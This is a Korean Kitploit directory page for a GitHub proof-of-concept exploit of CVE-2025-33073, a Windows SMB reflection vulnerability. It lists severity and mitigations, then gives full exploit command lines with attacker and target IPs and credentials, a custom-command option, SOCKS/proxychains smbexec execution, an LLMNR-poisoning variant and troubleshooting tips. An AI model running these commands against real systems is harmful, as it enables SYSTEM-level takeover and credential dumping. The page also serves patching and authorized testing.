Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
도구/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
Vulnerability AnalysisExploitationLateral MovementPenetration TestingCommand and ControlRed TeamingPayload Development
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

저장소 보기
169개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

✨ CVE-2025-33073: Windows SMB RCE 취약점 🚨

🔥 높은 심각도의 인증된 원격 코드 실행 🔥 Windows SMB 클라이언트의 부적절한 접근 제어 (CWE-284)


🛡️ 주요 정보 요약

도구 다운로드
항목세부 내용
CVSS v3.1 점수8.8 (높음) 🔥
영향을 받는 시스템Windows 10, 11, Server 2012–2025 (모든 에디션) 💻
공개일2025년 6월 10일 📅 (2025년 6월 화요일 패치에서 패치됨)
악용 여부야생에서 적극적으로 악용됨 😱
2025년 10월 21일 CISA KEV에 추가됨
공격 벡터네트워크 (인증됨) 🌐
영향SYSTEM 수준 코드 실행 👑
Kerberos 릴레이를 통한 측면 이동
우회NTLM 반사 완화 조치를 우회 ⚡

🛠️ 즉시 적용 가능한 완화 조치

  1. 지금 패치하세요! 🔧
    → Microsoft 업데이트 적용 (예: KB5060998)
    → Microsoft 업데이트 가이드 🔗

  2. SMB 서명 활성화 ✍️
    → 모든 클라이언트 및 서버에 적용
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. NTLM 제한 🚫
    → 가능한 경우 NTLM 차단
    → EDR 도구로 릴레이 시도 모니터링

  4. 자동화된 해결 방안? 🤖
    → Vicarius vRx 또는 사용자 정의 스크립트를 사용하여 대규모 수정


⚠️ 중요한 이유

  • 기존 NTLM 보호 조치를 우회 🛑
  • SMB 서명이 적용되지 않은 상태에서도 작동
  • 잘못 구성된 AD 환경에서 전체 도메인 장악 가능 🏰

2025년 11월 15일 기준 상태:
✅ 패치됨
❌ 패치되지 않은 시스템에서는 여전히 악용 중
🔔 CISA 마감일: 2025년 11월 10일 ⏰


⚠️ 사용 예시

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

사용자 정의 명령어 secretsdump 대신 사용자 정의 명령어를 실행할 수 있습니다.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS SYSTEM 권한으로 유효한 연결이 설정된 후 명령어를 더 은밀하게 실행하기 위한 방법입니다. --target과 --target-ip는 여기서 동일해야 합니다.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

또한 SAM을 덤프하는 대신 proxychains를 통해 사용자 정의 명령어를 실행할 수 있습니다.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

DNS 요구 사항 없이 수동 익스플로잇

장치와 동일한 브로드캐스트 도메인에 있고 LLMNR 포이즈닝에 취약한 경우, DNS 레코드를 등록하지 않고도 장치를 익스플로잇할 수 있습니다.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

문제 해결:

  • 공격이 때때로 작동하지 않는 경우가 있는데, 이는 공격에 호스트 이름을 사용하여 Kali에서 DNS 조회가 발생하기 때문입니다. Kali가 DNS 서버를 사용하지 않거나 impacket-ntlmrelayx에서 '/ FAILED' 메시지가 표시되면 호스트를 /etc/hosts 파일에 추가해 보십시오. 그러면 공격이 작동할 것입니다.

  • IP를 사용하면 공격이 작동해야 합니다. 때로는 여러 번 실행하면 실패 대신 SUCCESS가 발생합니다. 왜 이런 일이 발생하는지는 현재까지 완전히 명확하지 않습니다. 네트워킹과 관련이 있다고 생각됩니다.

  • -M 또는 --method를 사용하여 다른 강제 방법을 시도해 보십시오.


Wireshark:

로컬 NTLM 인증이 발생하는 경우

455252866-0a3fe643-2d52-427a-91f2-991770732f62

로컬 NTLM 인증이 발생하지 않아 FAILED 시도가 발생하는 경우

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

알아두면 좋은 점:

  • xterm은 가운데 마우스 버튼으로 복사 및 붙여넣기가 가능합니다.
  • DNS 레코드는 클라이언트에도 알려져 있어야 하며, 경우에 따라 시간이 더 걸릴 수 있습니다. 조금 더 시간이 걸린다는 의미는 몇 분 정도 기다리라는 뜻입니다.
  • 이것은 단순한 PoC이므로 AV/EDR 우회는 시도되지 않았습니다. 사용에 따른 책임은 본인에게 있습니다.

기다리지 말고 오늘 패치하세요! 🛑
네트워크의 보안이 그것에 달려 있습니다. 💪